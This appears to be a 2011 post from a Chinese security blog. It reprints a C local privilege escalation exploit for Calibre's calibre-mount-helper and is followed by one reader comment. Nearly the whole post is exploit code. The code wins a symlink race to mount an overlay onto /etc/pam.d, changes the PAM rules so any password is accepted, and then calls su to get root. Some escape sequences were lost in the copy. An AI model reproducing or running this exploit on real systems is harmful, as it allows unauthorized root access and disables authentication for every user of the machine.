Calibre E-Book Reader Local Root 3

#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>

int main(int argc, char **argv)
{
    printf("########################################################n");
    printf("#               .80 Calibrer Assault Mount             #n");
    printf("#                         by zx2c4                     #n");
    printf("########################################################nn");

    printf("[+] Cleaning up old cruft.n");
    unlink("/dev/shm/overlay");
    system("calibre-mount-helper cleanup /dev/ram0 /media/staging/");

    printf("[+] Creating overlay container.n");
    system("dd if=/dev/zero of=/dev/shm/overlay count=25600");
    system("/usr/sbin/mkfs.ntfs /dev/shm/overlay");

    printf("[+] Mounting staging using race condition toggler...n");
    int childpid = fork();
    if (childpid) {
        int ret;
        while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /media/staging/ 2>&1")) == 256 || ret == 8192);
        kill(childpid, SIGKILL);
    } else {
        while (1) {
            rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
            symlink("/dev/ram0", "/dev/shm/overlay");
            unlink("/dev/shm/overlay");
            rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
        }
        return 0;
    }

    printf("[+] Preparing overlay with /etc/pam.d modification:n");
    system("cp -v /etc/pam.d/* /media/staging/");
    system("sed -i "s/pam_deny.so/pam_permit.so/g" /media/staging/common-auth");
    system("sed -i "s/pam_cracklib.so.*/pam_permit.so/g" /media/staging/system-auth");
    system("sed -i "s/pam_unix.so.*/pam_permit.so/g" /media/staging/system-auth");

    printf("[+] Mounting overlay over /etc/pam.d using race condition toggler and inotify...n");
    childpid = fork();
    if (childpid) {
        int childpid2 = fork();
        if (childpid2) {
            int ret;
            while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /etc/pam.d/ 2>&1")) == 256 || ret == 8192);
            kill(childpid, SIGKILL);
            kill(childpid2, SIGKILL);
        } else {
            while (1) {
                int fd;
                fd = inotify_init();
                unlink("/media/staging/fake");
                mkdir("/media/staging/fake");
                inotify_add_watch(fd, "/media/staging/fake", IN_CREATE);
                read(fd, 0, 0);
                rename("/media/staging/fake", "/media/staging/tmp");
                symlink("/etc/pam.d", "/media/staging/fake");
                rmdir("/media/staging/tmp");
                close(fd);
            }
        }
    } else {
        while (1) {
            rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
            symlink("/dev/ram0", "/dev/shm/overlay");
            unlink("/dev/shm/overlay");
            rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
        }
        return 0;
    }

    printf("[+] Asking for root. When prompted for a password, type anything and press enter.n");
    system("su");

    return 0;
}

本文固定链接: https://www.unhonker.com/bug/364.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年11月06日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Calibre E-Book Reader Local Root 3 | 90' s Blog|关注网络信息安全

Calibre E-Book Reader Local Root 3:目前有1 条留言

  1. 沙发
    Leader:

    这个C语言有点强大了 顶起来~~~

    2012-03-27 15:41

发表评论

您必须 [ 登录 ] 才能发表留言!